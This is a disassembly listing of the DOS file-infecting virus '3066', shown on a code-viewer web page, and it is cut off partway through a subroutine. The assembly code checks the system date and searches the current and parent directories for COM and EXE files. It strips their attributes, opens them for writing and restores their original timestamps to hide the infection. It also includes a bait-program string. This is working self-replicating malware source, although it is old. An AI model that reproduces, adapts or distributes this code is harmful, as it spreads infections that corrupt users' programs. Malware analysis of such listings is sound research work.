📄 3066.asm
字号:
PAGE 59,132
;圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹
;圹 圹
;圹 3066 圹
;圹 圹
;圹 Created: 19-Mar-89 圹
;圹 Version: 圹
;圹 Passes: 5 Analysis Options on: QRS 圹
;圹 圹
;圹 圹
;圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹
.286c
data_1e equ 24h ; (0000:0024=45h)
data_2e equ 26h ; (0000:0026=3D1h)
data_3e equ 70h ; (0000:0070=0FF53h)
data_4e equ 72h ; (0000:0072=0F000h)
data_5e equ 80h ; (0000:0080=1094h)
data_6e equ 82h ; (0000:0082=123h)
data_7e equ 84h ; (0000:0084=109Eh)
data_8e equ 86h ; (0000:0086=123h)
data_9e equ 90h ; (0000:0090=156h)
data_10e equ 92h ; (0000:0092=44Bh)
data_11e equ 9Ch ; (0000:009C=0BCh)
data_13e equ 0B3h ; (0000:00B3=1)
data_14e equ 0C8h ; (0000:00C8=0DAh)
data_15e equ 0D1h ; (0000:00D1=10h)
data_16e equ 0DFh ; (0000:00DF=1)
data_17e equ 0E3h ; (0000:00E3=1)
data_18e equ 0EAh ; (0000:00EA=123h)
data_19e equ 0ECh ; (0000:00EC=10DAh)
data_20e equ 0EEh ; (0000:00EE=23h)
data_21e equ 0F1h ; (0000:00F1=10h)
data_22e equ 151h ; (0000:0151=0EAh)
data_23e equ 153h ; (0000:0153=0A6F0h)
data_24e equ 155h ; (0000:0155=0EAh)
data_25e equ 449h ; (0000:0449=3)
data_26e equ 972h ; (0000:0972=74h)
data_27e equ 80h ; (00AE:0080=0FFh)
data_28e equ 0A0h ; (5E5F:00A0=0FFh)
data_29e equ 0F00h ; (5E5F:0F00=0FFh)
data_30e equ 0FA0h ; (5E5F:0FA0=0FFh)
data_31e equ 0FF60h ; (5E5F:FF60=0FFFFh)
data_32e equ 0E0h ; (683D:00E0=0FFFFh)
data_33e equ 0 ; (6FB8:0000=0)
data_34e equ 4 ; (6FB8:0004=0)
data_35e equ 5 ; (6FB8:0005=0)
data_36e equ 87h ; (6FB8:0087=0)
data_37e equ 0A0h ; (6FB8:00A0=0)
data_38e equ 0DFh ; (6FB8:00DF=0)
data_39e equ 0E0h ; (6FB8:00E0=0)
data_40e equ 0E2h ; (6FB8:00E2=0)
data_41e equ 0E3h ; (6FB8:00E3=0)
data_42e equ 0E4h ; (6FB8:00E4=0)
data_43e equ 0E6h ; (6FB8:00E6=0)
data_44e equ 0E8h ; (6FB8:00E8=0)
data_45e equ 0EAh ; (6FB8:00EA=0)
data_46e equ 0ECh ; (6FB8:00EC=0)
data_47e equ 0EEh ; (6FB8:00EE=0)
data_48e equ 0EFh ; (6FB8:00EF=0)
data_49e equ 0F1h ; (6FB8:00F1=0)
data_50e equ 0F3h ; (6FB8:00F3=0)
data_51e equ 0F5h ; (6FB8:00F5=0)
data_93e equ 100h ; (7188:0100=0)
data_94e equ 0E2h ; (969B:00E2=0)
seg_a segment byte public
assume cs:seg_a, ds:seg_a
org 100h
3066 proc far
start:
jmp loc_5 ; (0243)
db 01h,0B4h
data_54 dw 0CD09h ; Data table (indexed access)
; xref 6FB8:0ADC, 0B5E, 0BA4, 0C67
; 0C7B, 0CCB, 0CD4
db 21h,0B8h, 00h, 4Ch,0CDh, 21h
db 'This program only exists to beco'
db 'me infected - COM version', 0Dh, 0Ah
db '$'
db 8Dh, 16h, 0Dh,0FFh,0FFh, 00h
db 01h, 8Ch
data_56 dw 4D10h ; Data table (indexed access)
; xref 6FB8:0270, 02DC, 046C
data_57 dw 6FB8h ; Data table (indexed access)
; xref 6FB8:0276, 02E0, 0470
data_58 db 0 ; Data table (indexed access)
; xref 6FB8:0387, 03C8, 0608, 06A4
db 8Dh, 16h, 0Dh,0FFh,0FFh, 09h
db 0CDh, 21h,0B8h, 00h, 4Ch,0CDh
db '!This program on', 0Dh, 0Ah, '$'
db 27 dup (0)
db 50h, 4Ch, 49h, 43h
db 60 dup (0)
db 01h, 3Fh
db 7 dup (3Fh)
db 43h, 4Fh, 4Dh, 20h, 00h
db 7 dup (0)
db 20h, 96h, 66h,0D7h, 12h, 4Ch
db 00h, 00h, 00h
db 'TSTJ3066.COM'
db 00h, 00h, 01h, 3Fh
db 10 dup (3Fh)
db 10h, 05h
db 7 dup (0)
db 20h,0E9h, 11h,0B5h, 12h,0F6h
db 48h, 02h, 00h
db 'CAT-TWO.ARC'
db 00h, 00h, 00h, 00h,0BCh, 0Eh
db 00h, 00h, 20h, 00h, 72h, 49h
db 73h, 12h,0EBh, 04h,0DDh, 0Ch
db 00h, 00h, 00h, 51h, 59h, 8Bh
db 0Fh, 20h, 00h
db 56h, 47h, 31h
loc_5: ; xref 6FB8:0100
jmp short loc_6 ; (0247)
db 0F5h, 0Bh
loc_6: ; xref 6FB8:0243
call sub_17 ; (08BB)
call sub_15 ; (0875)
mov ah,19h
int 21h ; DOS Services ah=function 19h
; get default drive al (0=a:)
mov ds:data_22e[si],si ; (0000:0151=0EAh)
add word ptr ds:data_22e[si],884h ; (0000:0151=0EAh)
mov ds:data_23e[si],cs ; (0000:0153=0A6F0h)
mov ds:data_17e[si],al ; (0000:00E3=1)
call sub_10 ; (076E)
mov dl,ds:data_94e[di] ; (969B:00E2=0)
mov ax,ds
push cs
pop ds
jnz loc_8 ; Jump if not zero
mov data_56[si],984h ; (6FB8:0151=4D10h)
mov data_57[si],ax ; (6FB8:0153=6FB8h)
cmp dl,0FFh
je loc_8 ; Jump if equal
mov ah,0Eh
int 21h ; DOS Services ah=function 0Eh
; set default drive dl (0=a:)
loc_8: ; xref 6FB8:026E, 027D
mov byte ptr ds:[872h][si],80h ; (6FB8:0872=0FFh)
mov word ptr ds:data_48e[si],0 ; (6FB8:00EF=0)
mov ah,2Ah ; '*'
int 21h ; DOS Services ah=function 2Ah
; get date, cx=year, dx=mon/day
cmp cx,7C4h
jge loc_9 ; Jump if > or =
jmp short loc_12 ; (02C2)
db 0BDh, 09h,0BCh, 0Eh, 00h
loc_9: ; xref 6FB8:0296
jg loc_10 ; Jump if >
cmp dh,0Ch
jl loc_12 ; Jump if <
cmp dl,5
jl loc_12 ; Jump if <
cmp dl,1Ch
jl loc_11 ; Jump if <
loc_10: ; xref 6FB8:029F
mov word ptr ds:[877h][si],0FFDCh ; (6FB8:0877=8EC0h)
mov byte ptr ds:[872h][si],88h ; (6FB8:0872=0FFh)
loc_11: ; xref 6FB8:02AE
cmp byte ptr [si+4],0F8h
nop ;*ASM fixup - displacement
jae loc_13 ; Jump if above or =
loc_12: ; xref 6FB8:0298, 02A4, 02A9, 0356
mov byte ptr cs:data_47e[si],0 ; (6FB8:00EE=0)
jmp loc_30 ; (0460)
cmp byte ptr [si+4],0F8h
nop ;*ASM fixup - displacement
jae loc_13 ; Jump if above or =
or byte ptr ds:[872h][si],4 ; (6FB8:0872=0FFh)
loc_13: ; xref 6FB8:02C0, 02D0
mov byte ptr ds:data_38e[si],0 ; (6FB8:00DF=0)
mov dx,data_56[si] ; (6FB8:0151=4D10h)
mov ds,data_57[si] ; (6FB8:0153=6FB8h)
mov ax,4300h
call sub_1 ; (0436)
jc loc_14 ; Jump if carry Set
mov cs:data_51e[si],cx ; (6FB8:00F5=0)
and cl,0FEh
mov ax,4301h
call sub_1 ; (0436)
jc loc_14 ; Jump if carry Set
mov ax,3D02h
int 21h ; DOS Services ah=function 3Dh
; open file, al=mode,name@ds:dx
jc loc_14 ; Jump if carry Set
push cs
pop ds
mov ds:data_48e[si],ax ; (6FB8:00EF=0)
mov bx,ax
mov ax,5700h
int 21h ; DOS Services ah=function 57h
; get/set file date & time
mov ds:data_49e[si],cx ; (6FB8:00F1=0)
mov ds:data_50e[si],dx ; (6FB8:00F3=0)
dec byte ptr [si+4]
nop ;*ASM fixup - displacement
mov dx,word ptr ds:[880h][si] ; (6FB8:0880=687h)
mov cx,word ptr ds:[882h][si] ; (6FB8:0882=90h)
add dx,4
nop ;*ASM fixup - sign extn byte
adc cx,0
mov ax,4200h
int 21h ; DOS Services ah=function 42h
; move file ptr, cx,dx=offset
loc_14: ; xref 6FB8:02EA, 02FA, 0301
push cs
pop ds
test byte ptr ds:[872h][si],4 ; (6FB8:0872=0FFh)
jz loc_15 ; Jump if zero
call sub_3 ; (051F)
jmp loc_30 ; (0460)
loc_15: ; xref 6FB8:0337
xor dl,dl ; Zero register
mov ah,47h ; 'G'
push si
add si,46h
int 21h ; DOS Services ah=function 47h
; get present dir,drive dl,1=a:
pop si
cmp byte ptr ds:data_47e[si],0 ; (6FB8:00EE=0)
jne loc_16 ; Jump if not equal
call sub_2 ; (0444)
jnc loc_17 ; Jump if carry=0
loc_16: ; xref 6FB8:034F
jmp loc_12 ; (02C2)
loc_17: ; xref 6FB8:0354, 0433
mov dx,si
add dx,data_36e ; (6FB8:0087=0)
mov ah,1Ah
int 21h ; DOS Services ah=function 1Ah
; set DTA to ds:dx
mov word ptr [si+5],2E2Ah
mov word ptr [si+7],4F43h
mov word ptr [si+9],4Dh
mov ah,4Eh ; 'N'
mov dx,si
add dx,5
loc_18: ; xref 6FB8:03A7
mov cx,20h
call sub_1 ; (0436)
jc loc_21 ; Jump if carry Set
mov dx,si
add dx,0A5h
mov data_58[si],0 ; (6FB8:0155=0)
call sub_4 ; (0535)
jc loc_20 ; Jump if carry Set
call sub_3 ; (051F)
loc_19: ; xref 6FB8:039C
jmp loc_29 ; (0454)
loc_20: ; xref 6FB8:038F
cmp byte ptr ds:data_20e[si],0 ; (0000:00EE=23h)
jne loc_19 ; Jump if not equal
cmp byte ptr ds:data_24e[si],0 ; (0000:0155=0EAh)
jne loc_25 ; Jump if not equal
mov ah,4Fh ; 'O'
jmp short loc_18 ; (0379)
loc_21: ; xref 6FB8:037F
mov word ptr [si+7],5845h
mov word ptr [si+9],45h
mov ah,4Eh ; 'N'
mov dx,si
add dx,5
loc_22: ; xref 6FB8:03E9
mov cx,20h
call sub_1 ; (0436)
jc loc_25 ; Jump if carry Set
mov dx,si
add dx,0A5h
mov data_58[si],0 ; (6FB8:0155=0)
call sub_4 ; (0535)
jc loc_24 ; Jump if carry Set
call sub_3 ; (051F)
loc_23: ; xref 6FB8:03DE
jmp short loc_29 ; (0454)
db 90h
loc_24: ; xref 6FB8:03D0
cmp byte ptr cs:data_47e[si],0 ; (6FB8:00EE=0)
jne loc_23 ; Jump if not equal
cmp byte ptr ds:data_24e[si],0 ; (0000:0155=0EAh)
jne loc_25 ; Jump if not equal
mov ah,4Fh ; 'O'
jmp short loc_22 ; (03BA)
loc_25: ; xref 6FB8:03A3, 03C0, 03E5
call sub_2 ; (0444)
mov dx,si
add dx,data_13e ; (0000:00B3=1)
mov ah,1Ah
int 21h ; DOS Services ah=function 1Ah
; set DTA to ds:dx
loc_26: ; xref 6FB8:0424
mov ah,4Fh ; 'O'
mov cx,10h
cmp byte ptr ds:data_16e[si],0 ; (0000:00DF=1)
jne loc_27 ; Jump if not equal
mov byte ptr ds:data_16e[si],1 ; (0000:00DF=1)
mov word ptr [si+5],2E2Ah
mov word ptr [si+7],2Ah
mov ah,4Eh ; 'N'
mov dx,si
add dx,5
loc_27: ; xref 6FB8:0402
call sub_1 ; (0436)
jc loc_29 ; Jump if carry Set
test byte ptr ds:data_14e[si],10h ; (0000:00C8=0DAh)
jz loc_26 ; Jump if zero
mov dx,si
add dx,data_15e ; (0000:00D1=10h)
mov ah,3Bh ; ';'
call sub_1 ; (0436)
jc loc_29 ; Jump if carry Set
jmp loc_17 ; (0359)
3066 endp
;哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌
; SUBROUTINE
;
; Called from: 6FB8:02E7, 02F7, 037C, 03BD, 041A, 042E, 0450
; 0571, 0582, 058A
;苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘
sub_1 proc near
int 21h ; DOS Services ah=function 43h
; get/set file attrb, nam@ds:dx
jc loc_ret_28 ; Jump if carry Set
test byte ptr cs:data_47e[si],0FFh ; (6FB8:00EE=0)
jz loc_ret_28 ; Jump if zero
stc ; Set carry flag
loc_ret_28: ; xref 6FB8:0438, 0440
retn
sub_1 endp
;哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌
; SUBROUTINE
;
; Called from: 6FB8:0351, 03EB, 0454
;苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘
sub_2 proc near
mov word ptr [si+5],5Ch
mov dx,si
add dx,5
mov ah,3Bh ; ';'
call sub_1 ; (0436)
retn
sub_2 endp
loc_29: ; xref 6FB8:0394, 03D5, 041D, 0431
call sub_2 ; (0444)
mov dx,si
add dx,46h
mov ah,3Bh ; ';'
int 21h ; DOS Services ah=function 3Bh
; set current dir, path @ ds:dx
loc_30: ; xref 6FB8:02C8, 033C
mov bx,ds:data_48e[si] ; (6FB8:00EF=0)
or bx,bx ; Zero ?
jz loc_32 ; Jump if zero
mov cx,ds:data_51e[si] ; (6FB8:00F5=0)
mov dx,data_56[si] ; (6FB8:0151=4D10h)
mov ds,data_57[si] ; (6FB8:0153=6FB8h)
cmp cx,20h
je loc_31 ; Jump if equal
mov ax,4301h
int 21h ; DOS Services ah=function 43h
; get/set file attrb, nam@ds:dx
loc_31: ; xref 6FB8:0477
push cs
pop ds
mov cx,ds:data_49e[si] ; (6FB8:00F1=0)
mov dx,ds:data_50e[si] ; (6FB8:00F3=0)
mov ax,5701h
int 21h ; DOS Services ah=function 57h
; get/set file date & time
mov ah,3Eh ; '>'
int 21h ; DOS Services ah=function 3Eh
; close file, bx=file handle
loc_32: ; xref 6FB8:0466
mov dl,ds:data_41e[si] ; (6FB8:00E3=0)
mov ah,0Eh
int 21h ; DOS Services ah=function 0Eh
; set default drive dl (0=a:)
call sub_16 ; (089A)
pop ax
mov ds:data_39e[si],ax ; (6FB8:00E0=0)
cmp byte ptr [si+3],0FFh
je loc_33 ; Jump if equal
add ax,10h
add [si+2],ax
pop ax
pop ds
;* jmp dword ptr cs:[si] ;*1 entry
db 0FFh, 2Ch
loc_33: ; xref 6FB8:04A5
call sub_10 ; (076E)
push cs
pop ds
mov ax,[si]
mov word ptr ds:[100h],ax ; (6FB8:0100=40E9h)
mov al,[si+2]
mov byte ptr ds:[102h],al ; (6FB8:0102=1)
jz loc_34 ; Jump if zero
mov bx,ds
add bx,1D0h
mov es,bx
mov di,si
mov dx,si
mov cx,0BFAh
call sub_20 ; (0D32)
mov cx,dx
mov si,dx
dec si
mov di,si
std ; Set direction flag
rep movsb ; Rep when cx >0 Mov [si] to es:[di]
push ds
pop es
mov di,data_93e ; (7188:0100=0)
mov ds,bx
mov si,dx
mov cx,0BFAh
call sub_20 ; (0D32)
mov si,100h
push cs
pop ds
call sub_13 ; (07CD)
mov dx,1D0h
loc_34: ; xref 6FB8:04C2
mov di,cs
add di,dx
mov word ptr [si+5],100h
mov [si+7],di
pop ax
pop ds
mov ds,di
mov es,di
mov ss,di
xor bx,bx ; Zero register
xor cx,cx ; Zero register
xor bp,bp ; Zero register
;* jmp dword ptr cs:[si+5] ;*1 entry
db 0FFh, 6Ch, 05h
loc_35: ; xref 6FB8:0574, 0585, 058D
mov byte ptr cs:data_47e[si],0 ; (6FB8:00EE=0)
retn
;哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌
; SUBROUTINE
;
; Called from: 6FB8:0339, 0391, 03D2
;苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘
sub_3 proc near
mov bx,ds:data_48e[si] ; (6FB8:00EF=0)
or bx,bx ; Zero ?
jz loc_ret_36 ; Jump if zero
mov dx,si
add dx,data_34e ; (6FB8:0004=0)
nop ;*ASM fixup - sign extn byte
mov cx,1
mov ah,40h ; '@'
int 21h ; DOS Services ah=function 40h
; write file cx=bytes, to ds:dx
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -